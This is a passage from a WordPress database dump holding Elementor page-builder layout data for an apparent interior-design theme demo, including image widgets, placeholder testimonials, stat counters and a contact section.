oads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3095,4751,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3096,4751,'_elementor_pro_version','3.8.1'),(3097,4751,'_elementor_css','a:6:{s:4:\"time\";i:1685009709;s:5:\"fonts\";a:1:{i:0;s:4:\"Reey\";}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3099,4752,'_wp_page_template','elementor_header_footer'),(3100,4752,'_elementor_edit_mode','builder'),(3101,4752,'_elementor_template_type','wp-page'),(3102,4752,'_elementor_version','3.8.1'),(3103,4752,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"LOREM IPSUM\",\"title\":\"LOREM IPSUM\\n\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Redesign Life<\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3104,4752,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(